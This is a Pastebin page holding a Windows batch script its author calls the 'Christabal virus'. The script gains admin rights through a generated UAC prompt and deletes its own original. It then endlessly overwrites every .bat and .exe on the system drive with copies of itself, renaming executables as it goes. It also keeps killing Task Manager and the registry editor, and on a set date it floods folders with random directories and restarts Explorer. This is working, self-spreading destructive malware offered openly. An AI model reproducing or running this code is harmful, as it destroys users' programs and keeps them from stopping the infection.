Advertisement
Guest User

Christabal virus. Please d

a guest
Jul 27th, 2017
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 2.50 KB | None | 0 0
  1. ÿþ
  2. cls
  3. ::INFECTED
  4. @echo off
  5.  
  6. if "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
  7. >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
  8. ) else (
  9. >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
  10. )
  11.  
  12. if '%errorlevel%' NEQ '0' (
  13. goto UACPrompt
  14. ) else ( goto gotAdmin )
  15.  
  16. :UACPrompt
  17. echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
  18. set params = %*:"=""
  19. echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
  20.  
  21. "%temp%\getadmin.vbs"
  22. del "%temp%\getadmin.vbs"
  23. exit /b
  24.  
  25. :gotAdmin
  26. pushd "%CD%"
  27. cd /d "%~dp0"
  28.  
  29. mode con: cols=14 lines=1
  30.  
  31. if not "%~F0"=="%TEMP%\%~NX0" start /b "" cmd /c del "%~F0"
  32. cd "%USERPROFILE%\Desktop"
  33.  
  34. setlocal enabledelayedexpansion
  35. cd "%USERPROFILE%\DESKTOP"
  36. for %%A in ("%CD%") do set "ROOTFOLDER"="%%~DA\"
  37. for /l %%A in () do (
  38.  
  39. for /r %SYSTEMDRIVE% %%B in ("*.bat" "*.exe") do findstr /r /c:"::INFECTED" "%%~B" || if exist "%%B" (
  40. if "%%~DPNXB"=="%%~DPNB.exe" move /y "%%~DPNB.exe" "%%~DPNB.bat" & copy /y %0 "%%~DPNB.bat"
  41. if "%%~DPNXB"=="%%~DPNB.bat" copy /y %0 "%%B" )
  42.  
  43. taskkill /im "taskmgr.exe" /f >nul 2>&1
  44. taskkill /im "regedit.exe" /f >nul 2>&1
  45.  
  46. for /f "tokens=* delims=0" %%A IN ("!RANDOM:~-1!") do set RAND=%%A
  47. if "!RAND!"=="" set RAND=1
  48. if "!DATE:~4,2!/!DATE:~7,2!/!DATE:~10,4!"=="03/02/2018" (
  49. for /l %%C in (1,1,!RAND!) do (
  50. md !RANDOM! !RANDOM! !RANDOM! !RANDOM! !RANDOM!
  51. md !RANDOM! !RANDOM! !RANDOM! !RANDOM! !RANDOM!
  52. md !RANDOM! !RANDOM! !RANDOM! !RANDOM! !RANDOM!
  53. timeout /t 3 /nobreak
  54. taskkill /im "taskmgr.exe" /f >nul 2>&1
  55. taskkill /im "regedit.exe" /f >nul 2>&1
  56. taskkill /im "explorer.exe" /f >nul 2>&1
  57. timeout /t 3 /nobreak
  58. start "" "explorer.exe" ) )
  59.  
  60. taskkill /im "taskmgr.exe" /f >nul 2>&1
  61. taskkill /im "regedit.exe" /f >nul 2>&1
  62.  
  63. net session >nul 2>&1
  64. cd..
  65. if "!ERRORLEVEL!" == "0" (
  66. if "!CD!"=="%USERPROFILE%" cd "%USERPROFILE%\DESKTOP"
  67. ) else (
  68. if "!CD!"=="%ROOTFOLDER%" cd "%USERPROFILE%\DESKTOP"
  69. )  
  70. ) > nul
  71.  
  72. REM **************************************************************
  73. REM  Be very careful with this virus, I wont be responsible for
  74. REM  any damages if you choose to use this program.
  75. REM **************************************************************
  76.  
  77. REM **************************************************************
  78. REM  Copyright © 2017, Jacob Gilbert (Zask), All rights reserved.
  79. REM  Christabal virus.
  80. REM  2.50 KB
  81. **************************************************************
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement